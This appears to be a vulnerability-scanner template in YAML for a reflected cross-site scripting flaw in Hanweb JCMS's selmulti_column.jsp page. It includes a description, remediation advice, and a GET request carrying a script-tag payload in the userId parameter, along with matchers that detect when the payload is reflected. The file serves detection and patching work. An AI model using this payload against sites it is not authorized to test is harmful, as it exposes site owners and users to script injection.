id: JCMS-M_5_b-XSS
info:
  name: Hanweb JCMS XSS cross-site scripting vulnerability
  author:
  - l0ne1y
  description: |-
    Hanweb JCMS selmulti_column.jsp cross-site scripting vulnerability.
    Hanweb JCMS is a content management system designed on a J2EE architecture. The system provides all the functions needed throughout the information lifecycle, including content collection, creation, management, delivery, publishing, and shared distribution.

    Hanweb JCMS has a cross-site scripting vulnerability, caused by the program failing to properly filter user-submitted input. A remote attacker can exploit it to execute arbitrary script code in the user's browser.
  severity: medium
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    https://www.hanweb.com/

    Temporary Fix:
    1. Filter inputs (including URL parameters), encode outputs, and combine whitelist and blacklist approaches. That means filtering all submitted content, filtering URL parameters to remove content that could cause script execution, then HTML-encoding content dynamically output to the page so scripts cannot execute in the browser. Although input filtering can be bypassed, it still blocks a large portion of XSS attacks; finally, restrict characters using a whitelist or blacklist.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,"<script>alert(/test/)</script>")
    - '!contains(body,"type=1&userId=2222222")'
  path:
  - '{{BaseURL}}/jcms/m_5_b/selmulti_column.jsp?type=1&userId=2222222%2b><script>alert(/test/)</script>'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
